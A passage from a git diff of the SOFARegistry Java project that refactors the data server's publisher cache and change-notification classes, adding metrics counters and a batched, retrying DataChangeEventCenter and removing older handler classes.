PublisherGroups(String dataCenter) { + this.dataCenter = dataCenter; + } + + Datum getDatum(String dataInfoId) { + PublisherGroup group = publisherGroupMap.get(dataInfoId); + return group == null ? null : group.toDatum(); + } + + DatumVersion getVersion(String dataInfoId) { + PublisherGroup group = publisherGroupMap.get(dataInfoId); + return group == null ? null : group.getVersion(); + } + + Map getVersions(Collection targetDataInfoIds) { + if (CollectionUtils.isEmpty(targetDataInfoIds)) { + final Map ret = + Maps.newHashMapWithExpectedSize(publisherGroupMap.size()); + publisherGroupMap.forEach((k, v) -> ret.put(k, v.getVersion())); + return ret; + } + final Map ret = Maps.newHashMapWithExpectedSize(targetDataInfoIds.size()); + for (String dataInfoId : targetDataInfoIds) { + PublisherGroup group = publisherGroupMap.get(dataInfoId); + if (group != null) { + ret.put(dataInfoId, group.getVersion()); + } + } + return ret; + } + + Map getAllDatum() { + Map map = Maps.newHashMapWithExpectedSize(publisherGroupMap.size()); + publisherGroupMap.forEach( + (k, v) -> { + map.put(k, v.toDatum()); + }); + return map; + } + + Map> getAllPublisher() { + Map> map = Maps.newHashMapWithExpectedSize(publisherGroupMap.size()); + publisherGroupMap.forEach( + (k, v) -> { + map.put(k, v.getPublishers()); + }); + return map; + } + + Map getByConnectId(ConnectId connectId) { + Map map = Maps.newHashMapWithExpectedSize(64); + publisherGroupMap.values().forEach(v -> map.putAll(v.getByConnectId(connectId))); + return map; + } + + PublisherGroup createGroupIfAbsent(String dataInfoId) { + return publisherGroupMap.computeIfAbsent( + dataInfoId, k -> new PublisherGroup(dataInfoId, dataCenter)); + } + + Map clean(ProcessId sessionProcessId, CleanContinues cleanContinues) { + Map versionMap = Maps.newHashMapWithExpectedSize(64); + for (PublisherGroup g : publisherGroupMap.values()) { + DatumVersion ver = g.clean(sessionProcessId, cleanContinues); + if (ver != null) { + versionMap.put(g.dataInfoId, ver); + } + } + return versionMap; + } + + DatumVersion remove(String dataInfoId, ProcessId sessionProcessId) { + PublisherGroup group = publisherGroupMap.get(dataInfoId); + return group == null ? null : group.clean(sessionProcessId, CleanContinues.ALWAYS); + } + + DatumVersion put(String dataInfoId, List publishers) { + if (CollectionUtils.isEmpty(publishers)) { + return null; + } + PublisherGroup group = createGroupIfAbsent(dataInfoId); + return group.put(publishers); + } + + DatumVersion remove( + String dataInfoId, + ProcessId sessionProcessId, + Map removedPublishers) { + PublisherGroup group = publisherGroupMap.get(dataInfoId); + return group == null ? null : group.remove(sessionProcessId, removedPublishers); + } + + Map getSummary(String sessionIpAddress) { + Map summaries = Maps.newHashMap(); + publisherGroupMap.forEach( + (k, g) -> { + DatumSummary summary = g.getSummary(sessionIpAddress); + if (!summary.isEmpty()) { + summaries.put(k, summary); + } + }); + return summaries; + } + + Set getSessionProcessIds() { + Set ids = Sets.newHashSet(); + publisherGroupMap.values().forEach(g -> ids.addAll(g.getSessionProcessIds())); + return ids; + } + + Map compact(long tombstoneTimestamp) { + Map compacts = Maps.newHashMap(); + publisherGroupMap + .values() + .forEach( + g -> { + int count = g.compact(tombstoneTimestamp); + if (count != 0) { + compacts.put(g.dataInfoId, count); + } + }); + return compacts; + } + + int tombstoneNum() { + int count = 0; + for (PublisherGroup group : publisherGroupMap.values()) { + count += group.tombstoneNum(); + } + return count; + } + + void updateVersion() { + publisherGroupMap.values().forEach(g -> g.updateVersion()); + } + + DatumVersion updateVersion(String dataInfoId) { + PublisherGroup group = publisherGroupMap.get(dataInfoId); + if (group == null) { + return null; + } + return group.updateVersion(); + } + + @Override + public String toString() { + return StringFormatter.format("PubGroups{{},size={}}", dataCenter, publisherGroupMap.size()); + } +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/UnPublisher.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/UnPublisher.java deleted file mode 100644 index 5db5d80b9..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/cache/UnPublisher.java +++ /dev/null @@ -1,50 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.cache; - -import com.alipay.sofa.registry.common.model.store.DataInfo; -import com.alipay.sofa.registry.common.model.store.Publisher; - -/** - * - * @author qian.lqlq - * @version $Id: UnPublisher.java, v 0.1 2018-01-11 20:05 qian.lqlq Exp $ - */ -public class UnPublisher extends Publisher { - - /** - * - * @param dataInfoId - * @param registerId - * @param registerTimeStamp - */ - public UnPublisher(String dataInfoId, String registerId, long registerTimeStamp) { - setDataInfoId(dataInfoId); - setRegisterId(registerId); - setRegisterTimestamp(registerTimeStamp); - //avoid new datum dataId is null - DataInfo dataInfo = DataInfo.valueOf(dataInfoId); - setDataId(dataInfo.getDataId()); - setGroup(dataInfo.getDataType()); - setInstanceId(dataInfo.getInstanceId()); - } - - @Override - public DataType getDataType() { - return DataType.UNPUBLISHER; - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/ChangeData.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/ChangeData.java deleted file mode 100644 index 166f8fa48..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/ChangeData.java +++ /dev/null @@ -1,120 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.change; - -import com.alipay.sofa.registry.common.model.dataserver.Datum; - -import java.util.concurrent.Delayed; -import java.util.concurrent.TimeUnit; - -/** - * changed data - * - * @author qian.lqlq - * @version $Id: ChangeData.java, v 0.1 2017-12-08 16:23 qian.lqlq Exp $ - */ -public class ChangeData implements Delayed { - - /** data changed */ - private Datum datum; - - /** change time */ - private Long gmtCreate; - - /** timeout */ - private long timeout; - - private DataSourceTypeEnum sourceType; - - private DataChangeTypeEnum changeType; - - /** - * constructor - * @param datum - * @param timeout - * @param sourceType - * @param changeType - */ - public ChangeData(Datum datum, long timeout, DataSourceTypeEnum sourceType, - DataChangeTypeEnum changeType) { - this.datum = datum; - this.gmtCreate = System.currentTimeMillis(); - this.timeout = timeout; - this.sourceType = sourceType; - this.changeType = changeType; - } - - /** - * Getter method for property datum. - * - * @return property value of datum - */ - public Datum getDatum() { - return datum; - } - - /** - * Setter method for property datum. - * - * @param datum value to be assigned to property datum - */ - public void setDatum(Datum datum) { - this.datum = datum; - } - - /** - * Getter method for property sourceType. - * - * @return property value of sourceType - */ - public DataSourceTypeEnum getSourceType() { - return sourceType; - } - - /** - * Getter method for property changeType. - * - * @return property value of changeType - */ - public DataChangeTypeEnum getChangeType() { - return changeType; - } - - @Override - public long getDelay(TimeUnit unit) { - return unit - .convert(gmtCreate + timeout - System.currentTimeMillis(), TimeUnit.MILLISECONDS); - } - - @Override - public int compareTo(Delayed o) { - if (o == this) { - return 0; - } - if (o instanceof ChangeData) { - ChangeData other = (ChangeData) o; - if (this.gmtCreate < other.gmtCreate) { - return -1; - } else if (this.gmtCreate > other.gmtCreate) { - return 1; - } else { - return 0; - } - } - return -1; - } -} \ No newline at end of file diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/ChangeMetrics.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/ChangeMetrics.java new file mode 100644 index 000000000..97f5f6198 --- /dev/null +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/ChangeMetrics.java @@ -0,0 +1,56 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.change; + +import io.prometheus.client.Counter; + +public final class ChangeMetrics { + private ChangeMetrics() {} + + private static final Counter CHANGE_COUNTER_ = + Counter.build() + .namespace("data") + .subsystem("change") + .name("notify_total") + .help("notify session") + .labelNames("type") + .register(); + + static final Counter.Child CHANGE_COMMIT_COUNTER = CHANGE_COUNTER_.labels("commit"); + // retry change + static final Counter.Child CHANGE_RETRY_COUNTER = CHANGE_COUNTER_.labels("retry"); + // skip change + static final Counter.Child CHANGE_SKIP_COUNTER = CHANGE_COUNTER_.labels("skip"); + + static final Counter.Child CHANGE_FAIL_COUNTER = CHANGE_COUNTER_.labels("fail"); + static final Counter.Child CHANGE_SUCCESS_COUNTER = CHANGE_COUNTER_.labels("success"); + + // should not use + private static final Counter CHANGE_TEMP_COUNTER_ = + Counter.build() + .namespace("data") + .subsystem("change") + .name("notify_temp_total") + .help("notify temp session") + .labelNames("type") + .register(); + + static final Counter.Child CHANGETEMP_SKIP_COUNTER = CHANGE_TEMP_COUNTER_.labels("skip"); + static final Counter.Child CHANGETEMP_COMMIT_COUNTER = CHANGE_TEMP_COUNTER_.labels("commit"); + static final Counter.Child CHANGETEMP_SUCCESS_COUNTER = CHANGE_TEMP_COUNTER_.labels("success"); + static final Counter.Child CHANGETEMP_FAIL_COUNTER = CHANGE_TEMP_COUNTER_.labels("fail"); +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/DataChangeEvent.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/DataChangeEvent.java new file mode 100644 index 000000000..9d40b8e47 --- /dev/null +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/DataChangeEvent.java @@ -0,0 +1,62 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.change; + +import com.google.common.collect.Lists; +import java.util.Collections; +import java.util.List; + +/** + * event for data changed + * + * @author qian.lqlq + * @version $Id: DataChangeEvent.java, v 0.1 2017-12-07 18:44 qian.lqlq Exp $ + */ +public class DataChangeEvent { + private final String dataCenter; + private final List dataInfoIds; + + public DataChangeEvent(String dataCenter, List dataInfoIds) { + this.dataCenter = dataCenter; + this.dataInfoIds = Collections.unmodifiableList(Lists.newArrayList(dataInfoIds)); + } + + /** + * Getter method for property dataCenter. + * + * @return property value of dataCenter + */ + public String getDataCenter() { + return dataCenter; + } + + public List getDataInfoIds() { + return dataInfoIds; + } + + @Override + public String toString() { + return "DataChangeEvent{" + + "dataCenter='" + + dataCenter + + '\'' + + ", dataInfoIds='" + + dataInfoIds + + '\'' + + '}'; + } +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/DataChangeEventCenter.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/DataChangeEventCenter.java new file mode 100644 index 000000000..44757bc68 --- /dev/null +++ b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/DataChangeEventCenter.java @@ -0,0 +1,483 @@ +/* + * Licensed to the Apache Software Foundation (ASF) under one or more + * contributor license agreements. See the NOTICE file distributed with + * this work for additional information regarding copyright ownership. + * The ASF licenses this file to You under the Apache License, Version 2.0 + * (the "License"); you may not use this file except in compliance with + * the License. You may obtain a copy of the License at + * + * http://www.apache.org/licenses/LICENSE-2.0 + * + * Unless required by applicable law or agreed to in writing, software + * distributed under the License is distributed on an "AS IS" BASIS, + * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. + * See the License for the specific language governing permissions and + * limitations under the License. + */ +package com.alipay.sofa.registry.server.data.change; + +import static com.alipay.sofa.registry.server.data.change.ChangeMetrics.*; + +import com.alipay.sofa.registry.common.model.Tuple; +import com.alipay.sofa.registry.common.model.dataserver.Datum; +import com.alipay.sofa.registry.common.model.dataserver.DatumVersion; +import com.alipay.sofa.registry.common.model.sessionserver.DataChangeRequest; +import com.alipay.sofa.registry.common.model.sessionserver.DataPushRequest; +import com.alipay.sofa.registry.common.model.store.Publisher; +import com.alipay.sofa.registry.common.model.store.SubDatum; +import com.alipay.sofa.registry.log.Logger; +import com.alipay.sofa.registry.log.LoggerFactory; +import com.alipay.sofa.registry.remoting.Channel; +import com.alipay.sofa.registry.remoting.Server; +import com.alipay.sofa.registry.remoting.exchange.Exchange; +import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; +import com.alipay.sofa.registry.server.data.cache.DatumCache; +import com.alipay.sofa.registry.server.shared.util.DatumUtils; +import com.alipay.sofa.registry.task.FastRejectedExecutionException; +import com.alipay.sofa.registry.task.KeyedThreadPoolExecutor; +import com.alipay.sofa.registry.util.ConcurrentUtils; +import com.alipay.sofa.registry.util.LoopRunnable; +import com.alipay.sofa.registry.util.StringFormatter; +import com.google.common.annotations.VisibleForTesting; +import com.google.common.collect.Lists; +import com.google.common.collect.Maps; +import com.google.common.collect.Sets; +import java.util.*; +import java.util.concurrent.TimeUnit; +import java.util.concurrent.locks.ReadWriteLock; +import java.util.concurrent.locks.ReentrantReadWriteLock; +import org.springframework.beans.factory.annotation.Autowired; + +/** + * @author qian.lqlq + * @version $Id: DataChangeEventCenter.java, v 0.1 2018-03-09 14:25 qian.lqlq Exp $ + */ +public final class DataChangeEventCenter { + private static final Logger LOGGER = LoggerFactory.getLogger(DataChangeEventCenter.class); + + @Autowired private DataServerConfig dataServerConfig; + + @Autowired private DatumCache datumCache; + + @Autowired private Exchange boltExchange; + + private final Map> dataCenter2Changes = Maps.newConcurrentMap(); + private final ReadWriteLock lock = new ReentrantReadWriteLock(); + private final LinkedList retryNotifiers = Lists.newLinkedList(); + + private final Map> dataCenter2TempChanges = Maps.newConcurrentMap(); + private final ReadWriteLock tempLock = new ReentrantReadWriteLock(); + + private final TempChangeMerger tempChangeMerger = new TempChangeMerger(); + private final ChangeMerger changeMerger = new ChangeMerger(); + + private KeyedThreadPoolExecutor notifyExecutor; + private KeyedThreadPoolExecutor notifyTempExecutor; + + public void init() { + this.notifyExecutor = + new KeyedThreadPoolExecutor( + "notify", + dataServerConfig.getNotifyExecutorPoolSize(), + dataServerConfig.getNotifyExecutorQueueSize()); + this.notifyTempExecutor = + new KeyedThreadPoolExecutor( + "notifyTemp", + dataServerConfig.getNotifyTempExecutorPoolSize(), + dataServerConfig.getNotifyTempExecutorQueueSize()); + + ConcurrentUtils.createDaemonThread("changeMerger", changeMerger).start(); + ConcurrentUtils.createDaemonThread("tempChangeMerger", tempChangeMerger).start(); + LOGGER.info( + "start DataChange NotifyIntervalMs={}, NotifyTempIntervalMs={}", + dataServerConfig.getNotifyIntervalMillis(), + dataServerConfig.getNotifyTempDataIntervalMillis()); + } + + public void onTempPubChange(Publisher publisher, String dataCenter) { + Map changes = + dataCenter2TempChanges.computeIfAbsent(dataCenter, k -> Maps.newConcurrentMap()); + tempLock.readLock().lock(); + try { + Datum existing = + changes.computeIfAbsent(publisher.getDataInfoId(), k -> new Datum(publisher, dataCenter)); + existing.addPublisher(publisher); + } finally { + tempLock.readLock().unlock(); + } + } + + public void onChange(Collection dataInfoIds, String dataCenter) { + Set changes = + dataCenter2Changes.computeIfAbsent(dataCenter, k -> Sets.newConcurrentHashSet()); + lock.readLock().lock(); + try { + changes.addAll(dataInfoIds); + } finally { + lock.readLock().unlock(); + } + } + + final class TempNotifier implements Runnable { + final Channel channel; + final Datum datum; + + TempNotifier(Channel channel, Datum datum) { + this.channel = channel; + this.datum = datum; + } + + @Override + public void run() { + try { + if (!channel.isConnected()) { + CHANGETEMP_FAIL_COUNTER.inc(); + LOGGER.info("temp change notify failed, conn is closed, {}", channel); + return; + } + notifyTempPub(channel, datum); + CHANGETEMP_SUCCESS_COUNTER.inc(); + } catch (Throwable e) { + CHANGETEMP_FAIL_COUNTER.inc(); + LOGGER.error("failed to notify temp {}, {}", channel, datum, e); + } + } + } + + private final class ChangeNotifierRetry { + final ChangeNotifier notifier; + final long expireTimestamp; + + ChangeNotifierRetry(ChangeNotifier notifier, long expireTimestamp) { + this.notifier = notifier; + this.expireTimestamp = expireTimestamp; + } + } + + final class ChangeNotifier implements Runnable { + final Channel channel; + final String dataCenter; + final Map dataInfoIds; + volatile int retryCount; + + private ChangeNotifier( + Channel channel, String dataCenter, Map dataInfoIds) { + this.dataCenter = dataCenter; + this.channel = channel; + this.dataInfoIds = dataInfoIds; + } + + @Override + public void run() { + try { + if (!channel.isConnected()) { + CHANGE_FAIL_COUNTER.inc(); + LOGGER.info("change notify failed, conn is closed, {}", channel); + return; + } + DataChangeRequest request = new DataChangeRequest(dataCenter, dataInfoIds); + doNotify(request, channel); + CHANGE_SUCCESS_COUNTER.inc(); + } catch (Throwable e) { + CHANGE_FAIL_COUNTER.inc(); + LOGGER.error("failed to notify {}, {}", channel, this, e); + retry(this); + } + } + + int size() { + int size = 0; + for (String dataInfoIds : dataInfoIds.keySet()) { + size += dataInfoIds.length(); + } + return size; + } + + @Override + public String toString() { + return StringFormatter.format( + "ChangeNotifier{{},num={},size={},retry={}}", + dataCenter, + dataInfoIds.size(), + size(), + retryCount); + } + } + + private void retry(ChangeNotifier notifier) { + notifier.retryCount++; + if (notifier.retryCount <= dataServerConfig.getNotifyRetryTimes()) { + if (commitRetry(notifier)) { + CHANGE_RETRY_COUNTER.inc(); + return; + } + } + CHANGE_SKIP_COUNTER.inc(); + LOGGER.warn("skip retry of full, {}", notifier); + } + + boolean commitRetry(ChangeNotifier retry) { + final int maxSize = dataServerConfig.getNotifyRetryQueueSize(); + final long expireTimestamp = + System.currentTimeMillis() + dataServerConfig.getNotifyRetryBackoffMillis(); + synchronized (retryNotifiers) { + if (retryNotifiers.size() >= maxSize) { + // remove first + retryNotifiers.removeFirst(); + } + retryNotifiers.add(new ChangeNotifierRetry(retry, expireTimestamp)); + } + return true; + } + + List getExpires() { + final List expires = Lists.newLinkedList(); + final long now = System.currentTimeMillis(); + synchronized (retryNotifiers) { + final Iterator it = retryNotifiers.iterator(); + while (it.hasNext()) { + ChangeNotifierRetry retry = it.next(); + if (retry.expireTimestamp <= now) { + expires.add(retry.notifier); + it.remove(); + } + } + } + return expires; + } + + private void notifyTempPub(Channel channel, Datum datum) { + // has temp pub, need to update the datum.version, we use the cache.datum.version as + // push.version + final DatumVersion v = datumCache.updateVersion(datum.getDataCenter(), datum.getDataInfoId()); + if (v == null) { + LOGGER.warn("not owns the DataInfoId when temp pub to {},{}", channel, datum.getDataInfoId()); + return; + } + Datum existDatum = datumCache.get(datum.getDataCenter(), datum.getDataInfoId()); + if (existDatum != null) { + datum.addPublishers(existDatum.getPubMap()); + } + datum.setVersion(v.getValue()); + SubDatum subDatum = DatumUtils.of(datum); + DataPushRequest request = new DataPushRequest(subDatum); + LOGGER.info("temp pub to {}, {}", channel, subDatum); + doNotify(request, channel); + } + + private void doNotify(Object request, Channel channel) { + Server sessionServer = boltExchange.getServer(dataServerConfig.getNotifyPort()); + sessionServer.sendSync(channel, request, dataServerConfig.getRpcTimeoutMillis()); + } + + boolean handleTempChanges(List channels) { + // first clean the event + List datums = Lists.newArrayList(); + tempLock.writeLock().lock(); + try { + for (Map change : dataCenter2TempChanges.values()) { + datums.addAll(change.values()); + change.clear(); + } + } finally { + tempLock.writeLock().unlock(); + } + if (datums.isEmpty()) { + return false; + } + if (channels.isEmpty()) { + LOGGER.warn("session conn is empty when temp change"); + return false; + } + for (Datum datum : datums) { + for (Channel channel : channels) { + try { + // group by connect && dataInfoId + notifyTempExecutor.execute( + Tuple.of(datum.getDataInfoId(), channel.getRemoteAddress()), + new TempNotifier(channel, datum)); + CHANGETEMP_COMMIT_COUNTER.inc(); + } catch (FastRejectedExecutionException e) { + CHANGETEMP_SKIP_COUNTER.inc(); + LOGGER.warn("commit notify temp full, {}, {}, {}", channel, datum, e.getMessage()); + } catch (Throwable e) { + CHANGETEMP_SKIP_COUNTER.inc(); + LOGGER.error("commit notify temp failed, {}, {}", channel, datum, e); + } + } + } + return true; + } + + private final class TempChangeMerger extends LoopRunnable { + + @Override + public void runUnthrowable() { + try { + Server server = boltExchange.getServer(dataServerConfig.getNotifyPort()); + Map channelMap = server.selectAvailableChannelsForHostAddress(); + handleTempChanges(Lists.newArrayList(channelMap.values())); + } catch (Throwable e) { + LOGGER.error("failed to merge temp change", e); + } + } + + @Override + public void waitingUnthrowable() { + ConcurrentUtils.sleepUninterruptibly( + dataServerConfig.getNotifyTempDataIntervalMillis(), TimeUnit.MILLISECONDS); + } + } + + boolean handleChanges(List channels) { + // first clean the event + final int maxItems = dataServerConfig.getNotifyMaxItems(); + final List events = transferChangeEvent(maxItems); + if (events.isEmpty()) { + return false; + } + if (channels.isEmpty()) { + LOGGER.error("session conn is empty when change"); + return false; + } + for (DataChangeEvent event : events) { + final Map changes = + Maps.newHashMapWithExpectedSize(event.getDataInfoIds().size()); + final String dataCenter = event.getDataCenter(); + for (String dataInfoId : event.getDataInfoIds()) { + DatumVersion datumVersion = datumCache.getVersion(dataCenter, dataInfoId); + if (datumVersion != null) { + changes.put(dataInfoId, datumVersion); + } + } + if (changes.isEmpty()) { + continue; + } + for (Channel channel : channels) { + try { + notifyExecutor.execute( + channel.getRemoteAddress(), + new ChangeNotifier(channel, event.getDataCenter(), changes)); + CHANGE_COMMIT_COUNTER.inc(); + } catch (FastRejectedExecutionException e) { + CHANGE_SKIP_COUNTER.inc(); + LOGGER.warn("commit notify full, {}, {}, {}", channel, changes.size(), e.getMessage()); + } catch (Throwable e) { + CHANGE_SKIP_COUNTER.inc(); + LOGGER.error("commit notify failed, {}, {}", channel, changes.size(), e); + } + } + } + return true; + } + + void handleExpire() { + final List retries = getExpires(); + // commit retry + for (ChangeNotifier retry : retries) { + try { + notifyExecutor.execute(retry.channel.getRemoteAddress(), retry); + CHANGE_COMMIT_COUNTER.inc(); + } catch (FastRejectedExecutionException e) { + CHANGE_SKIP_COUNTER.inc(); + LOGGER.warn( + "commit retry notify full, {}, {}, {}", + retry.channel, + retry.dataInfoIds.size(), + e.getMessage()); + } catch (Throwable e) { + CHANGE_SKIP_COUNTER.inc(); + LOGGER.error( + "commit retry notify failed, {}, {}", retry.channel, retry.dataInfoIds.size(), e); + } + } + } + + List transferChangeEvent(int maxItems) { + final List events = Lists.newArrayList(); + lock.writeLock().lock(); + try { + for (Map.Entry> change : dataCenter2Changes.entrySet()) { + final String dataCenter = change.getKey(); + List dataInfoIds = Lists.newArrayList(change.getValue()); + change.getValue().clear(); + List> parts = Lists.partition(dataInfoIds, maxItems); + for (int i = 0; i < parts.size(); i++) { + events.add(new DataChangeEvent(dataCenter, parts.get(i))); + } + } + } finally { + lock.writeLock().unlock(); + } + return events; + } + + private final class ChangeMerger extends LoopRunnable { + + @Override + public void runUnthrowable() { + try { + Server server = boltExchange.getServer(dataServerConfig.getNotifyPort()); + Map channelMap = server.selectAvailableChannelsForHostAddress(); + handleChanges(Lists.newArrayList(channelMap.values())); + handleExpire(); + } catch (Throwable e) { + LOGGER.error("failed to merge change", e); + } + } + + @Override + public void waitingUnthrowable() { + ConcurrentUtils.sleepUninterruptibly( + dataServerConfig.getNotifyIntervalMillis(), TimeUnit.MILLISECONDS); + } + } + + @VisibleForTesting + Set getOnChanges(String dataCenter) { + Set changes = dataCenter2Changes.get(dataCenter); + return changes == null ? Collections.emptySet() : Sets.newHashSet(changes); + } + + @VisibleForTesting + Map getOnTempPubChanges(String dataCenter) { + Map changes = dataCenter2TempChanges.get(dataCenter); + return changes == null ? Collections.emptyMap() : Maps.newHashMap(changes); + } + + @VisibleForTesting + void setDataServerConfig(DataServerConfig dataServerConfig) { + this.dataServerConfig = dataServerConfig; + } + + @VisibleForTesting + void setDatumCache(DatumCache datumCache) { + this.datumCache = datumCache; + } + + @VisibleForTesting + void setExchange(Exchange boltExchange) { + this.boltExchange = boltExchange; + } + + @VisibleForTesting + ChangeNotifier newChangeNotifier( + Channel channel, String dataCenter, Map dataInfoIds) { + return new ChangeNotifier(channel, dataCenter, dataInfoIds); + } + + @VisibleForTesting + TempNotifier newTempNotifier(Channel channel, Datum datum) { + return new TempNotifier(channel, datum); + } + + @VisibleForTesting + void setNotifyExecutor(KeyedThreadPoolExecutor notifyExecutor) { + this.notifyExecutor = notifyExecutor; + } + + @VisibleForTesting + void setNotifyTempExecutor(KeyedThreadPoolExecutor notifyTempExecutor) { + this.notifyTempExecutor = notifyTempExecutor; + } +} diff --git a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/DataChangeHandler.java b/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/DataChangeHandler.java deleted file mode 100644 index 6bf66a946..000000000 --- a/server/server/data/src/main/java/com/alipay/sofa/registry/server/data/change/DataChangeHandler.java +++ /dev/null @@ -1,194 +0,0 @@ -/* - * Licensed to the Apache Software Foundation (ASF) under one or more - * contributor license agreements. See the NOTICE file distributed with - * this work for additional information regarding copyright ownership. - * The ASF licenses this file to You under the Apache License, Version 2.0 - * (the "License"); you may not use this file except in compliance with - * the License. You may obtain a copy of the License at - * - * http://www.apache.org/licenses/LICENSE-2.0 - * - * Unless required by applicable law or agreed to in writing, software - * distributed under the License is distributed on an "AS IS" BASIS, - * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. - * See the License for the specific language governing permissions and - * limitations under the License. - */ -package com.alipay.sofa.registry.server.data.change; - -import com.alipay.sofa.registry.common.model.dataserver.Datum; -import com.alipay.sofa.registry.log.Logger; -import com.alipay.sofa.registry.log.LoggerFactory; -import com.alipay.sofa.registry.server.data.bootstrap.DataServerConfig; -import com.alipay.sofa.registry.server.data.cache.DatumCache; -import com.alipay.sofa.registry.server.data.cache.MergeResult; -import com.alipay.sofa.registry.server.data.change.event.DataChangeEventCenter; -import com.alipay.sofa.registry.server.data.change.event.DataChangeEventQueue; -import com.alipay.sofa.registry.server.data.change.notify.IDataChangeNotifier; -import com.alipay.sofa.registry.server.data.executor.ExecutorFactory; -import org.springframework.beans.factory.InitializingBean; -import org.springframework.beans.factory.annotation.Autowired; - -import javax.annotation.Resource; -import java.util.List; -import java.util.concurrent.Executor; - -/** - * notify sessionserver when data changed - * - * @author qian.lqlq - * @version $Id: DataChangeHandler.java, v 0.1 2017-12-07 18:44 qian.lqlq Exp $ - */ -public class DataChangeHandler implements InitializingBean { - - private static final Logger LOGGER = LoggerFactory.getLogger(DataChangeHandler.class); - - @Autowired - private DataServerConfig dataServerBootstrapConfig; - - @Autowired - private DataChangeEventCenter dataChangeEventCenter; - - @Resource - private List dataChangeNotifiers; - - @Override - public void afterPropertiesSet() { - //init DataChangeEventCenter - dataChangeEventCenter.init(dataServerBootstrapConfig); - start(); - } - - /** - * - */ - public void start() { - DataChangeEventQueue[] queues = dataChangeEventCenter.getQueues(); - int queueCount = queues.length; - Executor executor = ExecutorFactory.newFixedThreadPool(queueCount, - DataChangeHandler.class.getSimpleName()); - Executor notifyExecutor = ExecutorFactory.newFixedThreadPool( - dataServerBootstrapConfig.getQueueCount() * 5, this.getClass().getSimpleName()); - for (int idx = 0; idx < queueCount; idx++) { - final DataChangeEventQueue dataChangeEventQueue = queues[idx]; - final String name = dataChangeEventQueue.getName(); - LOGGER.info("[DataChangeHandler] begin to notify datum in queue:{}", name); - executor.execute(() -> { - while (true) { - try { - final ChangeData changeData = dataChangeEventQueue.take(); - notifyExecutor.execute(new ChangeNotifier(changeData, name)); - } catch (Throwable e) { - LOGGER.error("[DataChangeHandler][{}] notify scheduler error", name, e); - } - } - }); - LOGGER.info("[DataChangeHandler] notify datum in queue:{} success", name); - } - } - - /** - * - */ - private class ChangeNotifier implements Runnable { - - private ChangeData changeData; - - private String name; - - /** - * constructor - * @param changeData - * @param name - */ - public ChangeNotifier(ChangeData changeData, String name) { - this.changeData = changeData; - this.name = name; - } - - @Override - public void run() { - Datum datum = changeData.getDatum(); - String dataCenter = datum.getDataCenter(); - String dataInfoId = datum.getDataInfoId(); - long version = datum.getVersion(); - DataSourceTypeEnum sourceType = changeData.getSourceType(); - DataChangeTypeEnum changeType = changeData.getChangeType(); - try { - if (sourceType == DataSourceTypeEnum.CLEAN) { - if (DatumCache.cleanDatum(dataCenter, dataInfoId)) { - LOGGER - .info( - "[DataChangeHandler][{}] clean datum, dataCenter={}, dataInfoId={}, version={},sourceType={}, changeType={}", - name, dataCenter, dataInfoId, version, sourceType, changeType); - } - - } else { - Long lastVersion = null; - - if (sourceType == 